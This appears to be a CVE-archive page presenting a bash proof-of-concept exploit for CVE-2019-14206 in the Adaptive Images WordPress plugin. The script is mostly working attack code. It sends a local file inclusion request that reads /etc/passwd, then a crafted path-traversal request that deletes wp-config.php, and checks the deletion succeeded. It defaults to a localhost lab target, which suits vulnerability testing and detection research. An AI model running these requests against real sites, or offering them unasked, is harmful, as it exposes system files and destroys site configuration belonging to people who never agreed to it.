4837 Total CVEs
26 Years
GitHub
Home / 2019 / CVE-2019-14206
README.md
Rendering markdown...
POC / test-exploit.sh SH
⬇ Raw GitHub ✕ Close 
#!/bin/bash
# CVE-2019-14206 - Adaptive Images for WordPress Arbitrary File Deletion
# Test script to demonstrate the vulnerability

echo "=== CVE-2019-14206 PoC Test ==="
echo ""

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Base URL of vulnerable plugin
BASE_URL="${1:-http://localhost:8000}"
SCRIPT_PATH="/adaptive-images-script.php"
FULL_URL="${BASE_URL}${SCRIPT_PATH}"

echo -e "${YELLOW}[*] Testing vulnerable plugin at: ${FULL_URL}${NC}"
echo ""

# Check if target file exists before attack
TARGET_FILE="/Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/vulnerable-plugin/wp-config.php"
if [ -f "$TARGET_FILE" ]; then
    echo -e "${GREEN}[+] Target file exists: $TARGET_FILE${NC}"
else
    echo -e "${RED}[-] Target file not found: $TARGET_FILE${NC}"
    exit 1
fi

# Test 1: Basic LFI test (source_file parameter)
echo -e "${YELLOW}[*] Test 1: Testing LFI with source_file parameter...${NC}"
curl -s "${FULL_URL}?test=1&adaptive-images-settings[source_file]=/etc/passwd" | grep -q "root:" && echo -e "${GREEN}[+] LFI Vulnerability Confirmed!${NC}" || echo -e "${RED}[-] LFI Test Failed${NC}"

# Test 2: Arbitrary File Deletion
echo -e "${YELLOW}[*] Test 2: Testing Arbitrary File Deletion...${NC}"
EXPLOIT_URL="${FULL_URL}?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

echo "[*] Sending exploit request..."
RESPONSE=$(curl -s "$EXPLOIT_URL")

echo "[*] Response:"
echo "$RESPONSE"

# Check if file was deleted
if [ ! -f "$TARGET_FILE" ]; then
    echo ""
    echo -e "${GREEN}[+] SUCCESS! File deleted: $TARGET_FILE${NC}"
    echo -e "${GREEN}[+] Arbitrary File Deletion Vulnerability Confirmed!${NC}"
else
    echo ""
    echo -e "${RED}[-] File still exists - exploit may have failed${NC}"
fi

echo ""
echo -e "${YELLOW}[*] Test completed${NC}"